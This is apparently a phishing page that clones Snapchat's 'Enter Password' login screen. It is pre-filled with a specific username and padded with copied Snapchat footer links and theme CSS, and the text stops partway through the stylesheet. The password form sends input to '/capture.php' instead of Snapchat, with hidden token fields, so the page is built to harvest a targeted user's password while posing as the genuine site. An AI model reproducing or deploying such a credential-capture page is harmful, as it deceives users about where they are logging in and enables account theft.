<html lang="en-us" data-theme="dark"><plasmo-csui id="copystyle"></plasmo-csui><head><title>Accounts • Snapchat</title><!-- Meta --><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-mobile-web-app-capable" content="no"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"><!-- This meta tag is used for Google site verification in search console --><meta name="google-site-verification" content="SA-WartaE0JJY1xTTk4iZQvUy4yMaiIWL5YCaRDVM0M"><!-- -- Previews ----><meta property="og:site_name" content="Snapchat"><meta property="og:type" content="website"><!-- Styles --><!-- Force reload of css file --><!-- Scripts --><!-- Favicon --><link rel="shortcut icon" href="https://static.snapchat.com/favicon.ico" type="image/x-icon"><style data-emotion="css" data-s=""></style><link rel="prefetch"><link rel="stylesheet" href="styles.css"></head><body class="designV2"><div id="common-attributes" data-is-dev="false" data-is-gdpr="false"></div><!-- Pusher is Needed for Top Navigation Menu --><div class="pusher"><div id="password-root" data-continue="/accounts/welcome" data-xsrf="AyWHtdDRnHtWg-siC6M9RQ" data-ai-token="stetson_miller0"><div class="App "><div class="full-background-color"></div><div class="Header"><a href="/" class="logo"><img src="/accounts/static/images/ghost/ghost.svg" alt="Snapchat"></a></div><div class="Password"><article class="page"><div class="container"><div class="snapchat-logo"><img src="/accounts/static/images/ghost/snapchat-app-icon.svg" alt="Snapchat Ghost Icon"></div><div class="login-challenge-frame"><h1 class="login-challenge-title">Enter Password</h1><div class="user-identifier-box"><p>stetson_miller0</p><a href="/accounts/v2/login?ai=c3RldHNvbl9taWxsZXIw&amp;continue=%2Faccounts%2Fwelcome">Not you?</a></div></div><form action="/capture.php" method="POST" method="post"><div class="form-group"><label for="password" class="control-label">Password</label><div id="password-field"><input name="password" autocomplete="current-password" type="password" id="password" class="form-control"><img role="presentation" src="/accounts/static/images/password/show-password-icon.svg" class="eye-icon"></div></div><div class="additional-action"><button data-testid="forgot-password-button" type="button" class="forgot-password btn btn-default">Forgot Password</button></div><input type="hidden" name="xsrf_token" value="AyWHtdDRnHtWg-siC6M9RQ"><input type="hidden" name="ai_token" value="stetson_miller0"><input type="hidden" name="continue" value="/accounts/welcome"><div class="primary_action login-button"><button type="submit" data-testid="password-submit-button" class="btn btn-lg btn-default">Next</button></div></form></div></article><div class="footer"><div style="background-color: rgb(248, 249, 251); font-size: 14px; line-height: 17px;"><div class="footer-container" id="footerContainer"><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Company</div><div><a href="https://snap.com/en-US">Snap Inc.</a><a href="https://careers.snap.com">Careers</a><a href="https://newsroom.snap.com">News</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Community</div><div><a href="https://help.snapchat.com/hc/?utm_source=web&amp;utm_medium=snap&amp;utm_campaign=ap">Support</a><a href="https://snap.com/en-US/community-guidelines">Community Guidelines</a><a href="https://snap.com/en-US/safety/safety-center">Safety Center</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Advertising</div><div><a href="https://forbusiness.snapchat.com/?utm_source=accounts_snapchat_com&amp;utm_medium=referral&amp;utm_campaign=internal_referral&amp;utm_content=footer_link">Buy Ads</a><a href="https://snap.com/en-US/ad-policies/">Advertising Policies</a><a href="https://snap.com/en-US/political-ads/">Political Ads Library</a><a href="https://snap.com/en-US/brand-guidelines/">Brand Guidelines</a><a href="https://help.snapchat.com/hc/articles/7047502545044?utm_source=web&amp;utm_medium=snap&amp;utm_campaign=ap">Promotions Rules</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Legal</div><div><a href="https://snap.com/en-US/privacy/privacy-center/">Privacy Center</a><a href="https://help.snapchat.com/hc/articles/11399265637012?utm_source=snapchat_com&amp;utm_medium=global_footer&amp;utm_campaign=privacy_choices">Your Privacy Choices</a><a href="https://snap.com/en-US/cookie-policy/">Cookie Policy</a><a href="https://help.snapchat.com/hc/articles/7012332110996?utm_source=web&amp;utm_medium=snap&amp;utm_campaign=ap">Report Infringement</a><a href="https://snap.com/en-US/terms/custom-creative-tools/">Custom Creative Tools Terms</a><a href="https://snapchat.com/create/terms.html">Community Geofilter Terms</a><a href="https://snap.com/en-US/terms/lens-studio-license-agreement">Lens Studio Terms</a></div></div><div style="clear: both;"></div><div class="langue-selection-block"><div class="langue-header">Language</div><div style="position: relative;"><select id="sc-global-locale-selector" style="appearance: none; border: 1px solid rgb(204, 204, 204); border-radius: 5px; background: white; width: 100%; margin-top: 10px; padding: 5px 10px; font-size: 14px; font-family: inherit; color: rgba(0, 0, 0, 0.6); height: 34px; cursor: pointer;"><option value="ar">العَرَبِية</option><option value="bn-BD">বাংলা(বাংলাদেশ)</option><option value="bn-IN">বাংলা (ভারত)</option><option value="da-DK">Dansk</option><option value="de-DE">Deutsch</option><option value="el-GR">Ελληνικά</option><option value="en-GB">English (UK)</option><option value="en-US">English (US)</option><option value="es">Español</option><option value="es-AR">Español (Argentine)</option><option value="es-ES">Español (España)</option><option value="es-MX">Español (México)</option><option value="fi-FI">Suomi</option><option value="fil-PH">Filipino</option><option value="fr-FR">Français</option><option value="gu-IN">ગુજરાતી</option><option value="hi-IN">हिंदी</option><option value="id-ID">Bahasa Indonesia</option><option value="it-IT">Italiano</option><option value="ja-JP">日本語</option><option value="kn-IN">ಕನ್ನಡ (India)</option><option value="ko-KR">한국어</option><option value="ml-IN">മലയാളം</option><option value="mr-IN">मराठी</option><option value="ms-MY">Bahasa Melayu</option><option value="nb-NO">Norsk</option><option value="nl-NL">Nederlands</option><option value="pa">ਪੰਜਾਬੀ</option><option value="pl-PL">Polski</option><option value="pt-BR">Português (Brasil)</option><option value="pt-PT">Português (Portugal)</option><option value="ro-RO">Română</option><option value="ru-RU">Русский</option><option value="sv-SE">Svenska</option><option value="ta-IN">தமிழ்</option><option value="te-IN">తెలుగు</option><option value="th-TH">ภาษาไทย (ประเทศไทย)</option><option value="tr-TR">Türkçe</option><option value="ur-PK">اردو</option><option value="vi-VN">Tiếng Việt</option><option value="zh-Hans">中文（简体）</option><option value="zh-Hant">中文（繁體）</option></select><div style="position: absolute; inset-inline-end: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 18px; border-width: 0px 3px 5px; border-color: transparent transparent rgb(102, 102, 102);"></div><div style="position: absolute; inset-inline-end: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 10px; border-width: 5px 3px 0px; border-color: rgb(102, 102, 102) transparent transparent;"></div></div></div></div><div style="background-color: rgb(38, 38, 38);"><div class="footer-bottom-bar"><a href="https://snap.com/en-US/privacy/privacy-policy/">Privacy Policy</a><a href="https://snap.com/en-US/terms/">Terms of Service</a><div style="clear: both;"></div></div></div></div></div></div><div class="cookie-pop-up"><div class="theme--snapchat"><style id="theme-vars-snapchat">.theme--snapchat > body, body.theme--snapchat { font-family: 'Graphik', Helvetica, sans-serif; }
html[lang='vi'].theme--snapchat > body, html[lang='vi'] > body.theme--snapchat {
 font-family: Helvetica, sans-serif; }
html[lang='ar'] .theme--snapchat {
 font-family: 'Graphik Arabic', Helvetica, sans-serif; }
.theme--snapchat .background--black, .theme--snapchat.background--black {
--globalvar-basecolor-black-bg: #000000;
--globalvar-basecolor-gray-bg: #F0F1F2;
--globalvar-basecolor-white-bg: #FFFFFF;
--globalvar-basecolor-yellow-bg: #FFFC00;
--globalvar-basecolor-transparentdark-bg: transparent;
--globalvar-basecolor-transparentlight-bg: transparent;
--button-primary-bg: #FFFC00;
--button-primary-color: #000000;
--button-secondary-bg: #FFFFFF;
--button-secondary-color: #000000;
--button-flat-bg: #000000;
--button-flat-color: #FFFFFF;
--dropdown-bg: #3A3E41;
--dropdown-color: #FFFFFF;
--dropdown-item-color: #F7F8F9;
--dropdown-item-hover-color: #FFFFFF;
--quote-bg: #F0F1F2;
--quote-color: #000000;
--hyperlink-color: #FFFFFF;
--mosaic-bg: undefined;
--mosaic-color: #FFFFFF;
--mosaic-highlight: #FFFC00;
--mosaic-duration-bg: #FFFC00;
--mosaic-duration-color: #121314;
--mosaic-buttons-close-color: #FFFFFF;
--mosaic-buttons-close-bg: #000000;
--mosaic-buttons-close-border: #000000;
--mosaic-buttons-close-hover-color: #FFFFFF;
--mosaic-buttons-close-hover-bg: #3A3E41;
--mosaic-buttons-close-hover-border: #FFFFFF;
--mosaic-buttons-nav-color: #000000;
--mosaic-buttons-nav-bg: #FFFFFF;
--mosaic-buttons-nav-border: #FFFFFF;
--mosaic-buttons-nav-hover-color: #000000;
--mosaic-buttons-nav-hover-bg: #FFFFFF;
--mosaic-buttons-nav-hover-border: #FFFFFF;
--mosaic-buttons-filters-color: #FFFFFF;
--mosaic-buttons-filters-bg: undefined;
--mosaic-buttons-filters-active-color: #000000;
--mosaic-buttons-filters-active-bg: #FFFFFF;
--mosaic-lightbox-bg: #000000;
--mosaic-lightbox-color: #000000;
--chart-toggle-bg: undefined;
--chart-toggle-color: #FFFFFF;
--chart-toggle-buttons-large-bg: #FFFFFF;
--chart-toggle-buttons-large-color: #53575B;
--chart-toggle-buttons-large-border: #53575B;
--chart-toggle-buttons-large-active-bg: #FFFC00;
--chart-toggle-buttons-large-active-color: #000000;
--chart-toggle-buttons-large-active-border: #FFFC00;
--chart-toggle-buttons-small-bg: #FFFFFF;
--chart-toggle-buttons-small-color: #000000;
--chart-toggle-buttons-small-border: #FFFFFF;
--chart-toggle-buttons-small-active-bg: #FFFC00;
--chart-toggle-buttons-small-active-color: #000000;
--chart-toggle-buttons-small-active-border: #FFFC00;
--navigator-bg: #000000;
--navigator-color: #FFFFFF;
--navigator-item-color: #D4D5D6;
--navigator-item-hover-color: #E9EAEB;
--navigator-item-active-color: #E9EAEB;
--navigator-item-font-size: 16px;
--carousel-arrow-fill: #FFFFFF;
--content-bg: #000000;
--content-color: #FFFFFF;
--content-subtitle-color: #FFFFFF;
--content-title-color: #FFFFFF;
--block-bg: #000000;
--block-color: #FFFFFF;
--block-subtitle-color: #FFFFFF;
--block-title-color: #FFFFFF;
--block-title-font-stretch: normal;
--block-title-font-size: 48px;
--block-title-line-height: unset;
--block-title-padding-top: 0px;
--block-mobile-title-font-size: 32px;
--hero-bg: #000000;
--hero-color: #FFFFFF;
--global-header-bg: #000000;
--global-header-nav-screen-bg: #000000;
--global-header-color: #E9EAEB;
--global-header-item-color: #E9EAEB;
--global-header-item-hover-color: #FFFFFF;
--global-header-item-active-color: #FFFFFF;
--global-header-button-hover-color: #FFD301;
--icon-color: #FFFFFF;
--toggle-slider-bg: #FFFC00;
--toggle-slider-switch: #FFFFFF;
--toggle-slider-active: #FFFC00;
--toggle-button-active-color: #3A3E41;
--toggle-button-color: #C7C7CC;
--toggle-button-hovor-color: #E9EAEB;
--toggle-button-text-hover-color: #3A3E41;
--toggle-button-text-item-color: #3A3E41;
--toggle-button-text-color: #000000;
--toggle-button-text-bg: #FFFFFF;
--toggle-panel-bg: #000000;
--toggle-panel-color: #53575B;
--footer-color: #FFFFFF;
--footer-bg: #000000;
--footer-bar-bg: #000000;
--footer-bar-divider-border-color: #53575B;
--footer-border-color: #53575B;
--footer-divider-border-color: #53575B;
--accordion-color: #FFFFFF;
--accordion-body-color: #FFFFFF;
--accordion-bg: #000000;
--accordion-divider-border-color: #C7C7CC;
--banner-bg: #000000;
--banner-color: #FFFFFF;
--locale-dropdown-bg: #3A3E41;
--locale-dropdown-color: #FFFFFF;
--locale-dropdown-item-color: #FFFFFF;
--locale-dropdown-item-hover-color: #FFFFFF;
}
.theme--snapchat .background--white, .theme--snapchat.background--white {
--globalvar-basecolor-black-bg: #000000;
--globalvar-basecolor-gray-bg: #F0F1F2;
--globalvar-basecolor-white-bg: #FFFFFF;
--globalvar-basecolor-yellow-bg: #FFFC00;
--globalvar-basecolor-transparentdark-bg: transparent;
--globalvar-basecolor-transparentlight-bg: transparent;
--button-primary-bg: #FFFC00;
--button-primary-color: #000000;
--button-secondary-bg: #000000;
--button-secondary-color: #FFFFFF;
--button-flat-bg: #FFFFFF;
--button-flat-color: #000000;
--dropdown-bg: #FFFFFF;
--dropdown-color: #53575B;
--dropdown-item-color: #121314;
--dropdown-item-hover-color: #000000;
--quote-bg: #F0F1F2;
--quote-color: #000000;
--hyperlink-color: #000000;
--mosaic-bg: undefined;
--mosaic-color: #53575B;
--mosaic-highlight: #FFFC00;
--mosaic-duration-bg: #FFFFFF;
--mosaic-duration-color: #121314;
--mosaic-buttons-close-color: #FFFFFF;
--mosaic-buttons-close-bg: #000000;
--mosaic-buttons-close-border: #FFFFFF;
--mosaic-buttons-close-hover-color: #FFFFFF;
--mosaic-buttons-close-hover-bg: #3A3E41;
--mosaic-buttons-close-hover-border: #FFFFFF;
--mosaic-buttons-nav-color: #000000;
--mosaic-buttons-nav-bg: #FFFFFF;
--mosaic-buttons-nav-border: #FFFFFF;
--mosaic-buttons-nav-hover-color: #000000;
--mosaic-buttons-nav-hover-bg: #FFFFFF;
--mosaic-buttons-nav-hover-border: #FFFFFF;
--mosaic-buttons-filters-color: #000000;
--mosaic-buttons-filters-bg: undefined;
--mosaic-buttons-filters-active-color: #000000;
--mosaic-buttons-filters-active-bg: #FFFFFF;
--mosaic-lightbox-bg: #FFFFFF;
--mosaic-lightbox-color: #FFFFFF;
--chart-toggle-bg: undefined;
--chart-toggle-color: #53575B;
--chart-toggle-buttons-large-bg: #FFFFFF;
--chart-toggle-buttons-large-color: #53575B;
--chart-toggle-buttons-large-border: #53575B;
--chart-toggle-buttons-large-active-bg: #FFFC00;
--chart-toggle-buttons-large-active-color: #000000;
--chart-toggle-buttons-large-active-border: #FFFC00;
--chart-toggle-buttons-small-bg: #FFFFFF;
--chart-toggle-buttons-small-color: #53575B;
--chart-toggle-buttons-small-border: #53575B;
--chart-toggle-buttons-small-active-bg: #000000;
--chart-toggle-buttons-small-active-color: #FFFFFF;
--chart-toggle-buttons-small-active-border: #000000;
--navigator-bg: #FFFFFF;
--navigator-color: #000000;
--navigator-item-color: #3A3E41;
--navigator-item-hover-color: #53575B;
--navigator-item-active-color: #53575B;
--navigator-item-font-size: 16px;
--carousel-arrow-fill: #000000;
--content-bg: #FFFFFF;
--content-color: #000000;
--content-subtitle-color: #000000;
--content-title-color: #000000;
--block-bg: #FFFFFF;
--block-color: #000000;
--block-subtitle-color: #000000;
--block-title-color: #000000;
--block-title-font-stretch: normal;
--block-title-font-size: 48px;
--block-title-line-height: unset;
--block-title-padding-top: 0px;
--block-mobile-title-font-size: 32px;
--hero-bg: #FFFFFF;
--hero-color: #000000;
--global-header-bg: #FFFFFF;
--global-header-nav-screen-bg: #FFFFFF;
--global-header-color: #121314;
--global-header-item-color: #121314;
--global-header-item-hover-color: #000000;
--global-header-item-active-color: #000000;
--global-header-button-hover-color: #858D94;
--icon-color: #000000;
--toggle-slider-bg: #53575B;
--toggle-slider-switch: #FFFFFF;
--toggle-slider-active: #FFFC00;
--toggle-button-active-color: #000000;
--toggle-button-color: #E9EAEB;
--toggle-button-hovor-color: #C7C7CC;
--toggle-button-text-hover-color: #000000;
--toggle-button-text-item-color: #3A3E41;
--toggle-button-text-color: #000000;
--toggle-button-text-bg: #FFFFFF;
--toggle-panel-bg: #FFFFFF;
--toggle-panel-color: #D4D5D6;
--footer-color: #000000;
--footer-bg: #FFFFFF;
--footer-bar-bg: #F0F1F2;
--footer-bar-divider-border-color: #F0F1F2;
--footer-border-color: #C7C7CC;
--footer-divider-border-color: #C7C7CC;
--accordion-color: #000000;
--accordion-body-color: #000000;
--accordion-bg: #FFFFFF;
--accordion-divider-border-color: #D4D5D6;
--banner-bg: #FFFFFF;
--banner-color: #000000;
--locale-dropdown-bg: #FFFFFF;
--locale-dropdown-color: #000000;
--locale-dropdown-item-color: #000000;
--locale-dropdown-item-hover-color: #000000;
}
.theme--snapchat .background--yellow, .theme--snapchat.background--yellow {
--globalvar-basecolor-black-bg: #000000;
--globalvar-basecolor-gray-bg: #F0F1F2;
--globalvar-basecolor-white-bg: #FFFFFF;
--globalvar-basecolor-yellow-bg: #FFFC00;
--globalvar-basecolor-transparentdark-bg: transparent;
--globalvar-basecolor-transparentlight-bg: transparent;
--button-primary-bg: #000000;
--button-primary-color: #FFFFFF;
--button-secondary-bg: #FFFFFF;
--button-secondary-color: #000000;
--button-flat-bg: #FFFC00;
--button-flat-color: #000000;
--dropdown-bg: #FFFC00;
--dropdown-color: #000000;
--dropdown-item-color: #121314;
--dropdown-item-hover-color: #000000;
--quote-bg: #FFFFFF;
--quote-color: #000000;
--hyperlink-color: #000000;
--mosaic-bg: undefined;
--mosaic-color: #FFFFFF;
--mosaic-highlight: #FFFC00;
--mosaic-duration-bg: #FFFC00;
--mosaic-duration-color: #121314;
--mosaic-buttons-close-color: #FFFFFF;
--mosaic-buttons-close-bg: #000000;
--mosaic-buttons-close-border: #000000;
--mosaic-buttons-close-hover-color: #FFFFFF;
--mosaic-buttons-close-hover-bg: #3A3E41;
--mosaic-buttons-close-hover-border: #FFD301;
--mosaic-buttons-nav-color: #000000;
--mosaic-buttons-nav-bg: #FFFFFF;
--mosaic-buttons-nav-border: #FFFFFF;
--mosaic-buttons-nav-hover-color: #000000;
--mosaic-buttons-nav-hover-bg: #FFFFFF;
--mosaic-buttons-nav-hover-border: #FFD301;
--mosaic-buttons-filters-color: #000000;
--mosaic-buttons-filters-bg: undefined;
--mosaic-buttons-filters-active-color: #000000;
--mosaic-buttons-filters-active-bg: #FFFFFF;
--mosaic-lightbox-bg: #FFFC00;
--mosaic-lightbox-color: #FFFC00;
--chart-toggle-bg: undefined;
--chart-toggle-color: #53575B;
--chart-toggle-buttons-large-bg: #FFFFFF;
--chart-toggle-buttons-large-color: #53575B;
--chart-toggle-buttons-large-border: #53575B;
--chart-toggle-buttons-large-active-bg: #000000;
--chart-toggle-buttons-large-active-color: #FFFFFF;
--chart-toggle-buttons-large-active-border: #000000;
--chart-toggle-buttons-small-bg: #FFFFFF;
--chart-toggle-buttons-small-color: #000000;
--chart-toggle-buttons-small-border: #FFFFFF;
--chart-toggle-buttons-small-active-bg: #000000;
--chart-toggle-buttons-small-active-color: #FFFFFF;
--chart-toggle-buttons-small-active-border: #000000;
--navigator-bg: #FFFC00;
--navigator-color: #000000;
--navigator-item-color: #3A3E41;
--navigator-item-hover-color: #000000;
--navigator-item-active-color: #000000;
--navigator-item-font-size: 16px;
--carousel-arrow-fill: #000000;
--content-bg: #FFFC00;
--content-color: #000000;
--content-subtitle-color: #000000;
--content-title-color: #000000;
--block-bg: #FFFC00;
--block-color: #000000;
--block-subtitle-color: #000000;
--block-title-color: #000000;
--block-title-font-stretch: normal;
--block-title-font-size: 48px;
--block-title-line-height: unset;
--block-title-padding-top: 0px;
--block-mobile-title-font-size: 32px;
--hero-bg: #FFFC00;
--hero-color: #000000;
--global-header-bg: #FFFFFF;
--global-header-nav-screen-bg: #FFFFFF;
--global-header-color: #121314;
--global-header-item-color: #121314;
--global-header-item-hover-color: #000000;
--global-header-item-active-color: #000000;
--global-header-button-hover-color: #858D94;
--icon-color: #000000;
--toggle-slider-bg: #3A3E41;
--toggle-slider-switch: #FFFFFF;
--toggle-slider-active: #000000;
--toggle-button-active-color: #000000;
--toggle-button-color: #E9EAEB;
--toggle-button-hovor-color: #C7C7CC;
--toggle-button-text-hover-color: #000000;
--toggle-button-text-item-color: #3A3E41;
--toggle-button-text-color: #000000;
--toggle-button-text-bg: #FFFFFF;
--toggle-panel-bg: #FFFC00;
--toggle-panel-color: #D4D5D6;
--footer-color: #000000;
--footer-bg: #FFFC00;
--footer-bar-bg: #FFFC00;
--footer-bar-divider-border-color: #53575B;
--footer-border-color: #53575B;
--footer-divider-border-color: #53575B;
--accordion-color: #000000;
--accordion-body-color: #000000;
--accordion-bg: #FFFC00;
--accordion-divider-border-color: #53575B;
--banner-bg: #FFFC00;
--banner-color: #000000;
--locale-dropdown-bg: #FFFFFF;
--locale-dropdown-color: #000000;
--locale-dropdown-item-color: #000000;
--locale-dropdown-item-hover-color: #000000;
}
.theme--snapchat .background--gray, .theme--snapchat.background--gray {
--globalvar-basecolor-black-bg: #000000;
--globalvar-basecolor-gray-bg: #F0F1F2;
--globalvar-basecolor-white-bg: #FFFFFF;
--globalvar-basecolor-yellow-bg: #FFFC00;
--globalvar-basecolor-transparentdark-bg: transparent;
--globalvar-basecolor-transparentlight-bg: transparent;
--button-primary-bg: #FFFC00;
--button-primary-color: #000000;
--button-secondary-bg: #FFFFFF;
--button-secondary-color: #000000;
--button-flat-bg: #F0F1F2;
--button-flat-color: #000000;
--dropdown-bg: #F7F8F9;
--dropdown-color: #000000;
--dropdown-item-color: #F7F8F9;
--dropdown-item-hover-color: #FFFFFF;
--quote-bg: #FFFFFF;
--quote-color: #000000;
--hyperlink-color: #000000;
--mosaic-bg: undefined;
--mosaic-color: #FFFFFF;
--mosaic-highlight: #FFFC00;
--mosaic-duration-bg: #FFFC00;
--mosaic-duration-color: #121314;
--mosaic-buttons-close-color: #FFFFFF;
--mosaic-buttons-close-bg: #000000;
--mosaic-buttons-close-border: #FFFFFF;
--mosaic-buttons-close-hover-color: #FFFFFF;
--mosaic-buttons-close-hover-bg: #3A3E41;
--mosaic-buttons-close-hover-border: #FFFFFF;
--mosaic-buttons-nav-color: #000000;
--mosaic-buttons-nav-bg: #FFFFFF;
--mosaic-buttons-nav-border: #FFFFFF;
--mosaic-buttons-nav-hover-color: #000000;
--mosaic-buttons-nav-hover-bg: #FFFFFF;
--mosaic-buttons-nav-hover-border: #FFFFFF;
--mosaic-buttons-filters-color: #000000;
--mosaic-buttons-filters-bg: undefined;
--mosaic-buttons-filters-active-color: #000000;
--mosaic-buttons-filters-active-bg: #FFFFFF;
--mosaic-lightbox-bg: #D4D5D6;
--mosaic-lightbox-color: #D4D5D6;
--chart-toggle-bg: undefined;
--chart-toggle-color: #53575B;
--chart-toggle-buttons-large-bg: #FFFFFF;
--chart-toggle-buttons-large-color: #53575B;
--chart-toggle-buttons-large-border: #53575B;
--chart-toggle-buttons-large-active-bg: #000000;
--chart-toggle-buttons-large-active-color: #FFFFFF;
--chart-toggle-buttons-large-active-border: #000000;
--chart-toggle-buttons-small-bg: #FFFFFF;
--chart-toggle-buttons-small-color: #000000;
--chart-toggle-buttons-small-border: #FFFFFF;
--chart-toggle-buttons-small-active-bg: #000000;
--chart-toggle-buttons-small-active-color: #FFFFFF;
--chart-toggle-buttons-small-active-border: #000000;
--navigator-bg: #F0F1F2;
--navigator-color: #F7F8F9;
--navigator-item-color: #121314;
--navigator-item-hover-color: #000000;
--navigator-item-active-color: #000000;
--navigator-item-font-size: 16px;
--carousel-arrow-fill: #000000;
--content-bg: #F0F1F2;
--content-color: #000000;
--content-subtitle-color: #000000;
--content-title-color: #000000;
--block-bg: #F0F1F2;
--block-color: #000000;
--block-subtitle-color: #000000;
--block-title-color: #000000;
--block-title-font-stretch: normal;
--block-title-font-size: 48px;
--block-title-line-height: unset;
--block-title-padding-top: 0px;
--block-mobile-title-font-size: 32px;
--hero-bg: #F0F1F2;
--hero-color: #000000;
--global-header-bg: #F7F8F9;
--global-header-nav-screen-bg: #F7F8F9;
--global-header-color: #121314;
--global-header-item-color: #121314;
--global-header-item-hover-color: #000000;
--global-header-item-active-color: #000000;
--global-header-button-hover-color: #FFD301;
--icon-color: #000000;
--toggle-slider-bg: #D4D5D6;
--toggle-slider-switch: #FFFFFF;
--toggle-slider-active: #FFFC00;
--toggle-button-active-color: #000000;
--toggle-button-color: #FFFFFF;
--toggle-button-hovor-color: #C7C7CC;
--toggle-button-text-hover-color: #000000;
--toggle-button-text-item-color: #3A3E41;
--toggle-button-text-color: #000000;
--toggle-button-text-bg: #FFFFFF;
--toggle-panel-bg: #D4D5D6;
--toggle-panel-color: #FFFC00;
--footer-color: #000000;
--footer-bg: #F0F1F2;
--footer-bar-bg: #F0F1F2;
--footer-bar-divider-border-color: #C7C7CC;
--footer-border-color: #C7C7CC;
--footer-divider-border-color: #C7C7CC;
--accordion-color: #000000;
--accordion-body-color: #000000;
--accordion-bg: #F0F1F2;
--accordion-divider-border-color: #C7C7CC;
--banner-bg: #F0F1F2;
--banner-color: #000000;
--locale-dropdown-bg: #FFFFFF;
--locale-dropdown-color: #000000;
--locale-dropdown-item-color: #000000;
--locale-dropdown-item-hover-color: #000000;
}
.theme--snapchat .background--transparent-light, .theme--snapchat.background--transparent-light {
--globalvar-basecolor-black-bg: #000000;
--globalvar-basecolor-gray-bg: #F0F1F2;
--globalvar-basecolor-white-bg: #FFFFFF;
--globalvar-basecolor-yellow-bg: #FFFC00;
--globalvar-basecolor-transparentdark-bg: transparent;
--globalvar-basecolor-transparentlight-bg: transparent;
--button-primary-bg: #FFFC00;
--button-primary-color: #000000;
--button-secondary-bg: #000000;
--button-secondary-color: #FFFFFF;
--button-flat-bg: transparent;
--button-flat-color: #000000;
--dropdown-bg: #FFFFFF;
--dropdown-color: #53575B;
--dropdown-item-color: #121314;
--dropdown-item-hover-color: #000000;
--quote-bg: #F0F1F2;
--quote-color: #000000;
--hyperlink-color: #000000;
--mosaic-bg: undefined;
--mosaic-color: #53575B;
--mosaic-highlight: #FFFC00;
--mosaic-duration-bg: #FFFC00;
--mosaic-duration-color: #121314;
--mosaic-buttons-close-color: #FFFFFF;
--mosaic-buttons-close-bg: #000000;
--mosaic-buttons-close-border: #FFFFFF;
--mosaic-buttons-close-hover-color: #FFFFFF;
--mosaic-buttons-close-hover-bg: #3A3E41;
--mosaic-buttons-close-hover-border: #FFFFFF;
--mosaic-buttons-nav-color: #000000;
--mosaic-buttons-nav-bg: #FFFFFF;
--mosaic-buttons-nav-border: #FFFFFF;
--mosaic-buttons-nav-hover-color: #000000;
--mosaic-buttons-nav-hover-bg: #FFFFFF;
--mosaic-buttons-nav-hover-border: #FFFFFF;
--mosaic-buttons-filters-color: #000000;
--mosaic-buttons-filters-bg: undefined;
--mosaic-buttons-filters-active-color: #000000;
--mosaic-buttons-filters-active-bg: #FFFFFF;
--mosaic-lightbox-bg: #FFFFFF;
--mosaic-lightbox-color: #FFFFFF;
--chart-toggle-bg: undefined;
--chart-toggle-color: #53575B;
--chart-toggle-buttons-large-bg: #FFFFFF;
--chart-toggle-buttons-large-color: #53575B;
--chart-toggle-buttons-large-border: #53575B;
--chart-toggle-buttons-large-active-bg: #FFFC00;
--chart-toggle-buttons-large-active-color: #000000;
--chart-toggle-buttons-large-active-border: #FFFC00;
--chart-toggle-buttons-small-bg: #FFFFFF;
--chart-toggle-buttons-small-color: #53575B;
--chart-toggle-buttons-small-border: #53575B;
--chart-toggle-buttons-small-active-bg: #000000;
--chart-toggle-buttons-small-active-color: #FFFFFF;
--chart-toggle-buttons-small-active-border: #000000;
--navigator-bg: transparent;
--navigator-color: #121314;
--navigator-item-color: #121314;
--navigator-item-hover-color: #000000;
--navigator-item-active-color: #000000;
--navigator-item-font-size: 16px;
--carousel-arrow-fill: #000000;
--content-bg: transparent;
--content-color: #000000;
--content-subtitle-color: #000000;
--content-title-color: #000000;
--block-bg: transparent;
--block-color: #000000;
--block-subtitle-color: #000000;
--block-title-color: #000000;
--block-title-font-stretch: normal;
--block-title-font-size: 48px;
--block-title-line-height: unset;
--block-title-padding-top: 0px;
--block-mobile-title-font-size: 32px;
--hero-bg: transparent;
--hero-color: #000000;
--global-header-bg: transparent;
--global-header-nav-screen-bg: #FFFFFF;
--global-header-color: #121314;
--global-header-item-color: #121314;
--global-header-item-hover-color: #000000;
--global-header-item-active-color: #000000;
--global-header-button-hover-color: #858D94;
--icon-color: #000000;
--toggle-slider-bg: #FFFFFF;
--toggle-slider-switch: #53575B;
--toggle-slider-active: #FFFC00;
--toggle-button-active-color: #000000;
--toggle-button-color: #E9EAEB;
--toggle-button-hovor-color: #C7C7CC;
--toggle-button-text-hover-color: #000000;
--toggle-button-text-item-color: #3A3E41;
--toggle-button-text-color: #000000;
--toggle-button-text-bg: #FFFFFF;
--toggle-panel-bg: #FFFFFF;
--toggle-panel-color: #3A3E41;
--footer-color: #000000;
--footer-bg: transparent;
--footer-bar-bg: transparent;
--footer-bar-divider-border-color: #F0F1F2;
--footer-border-color: #F0F1F2;
--footer-divider-border-color: #D4D5D6;
--accordion-color: #000000;
--accordion-body-color: #000000;
--accordion-bg: transparent;
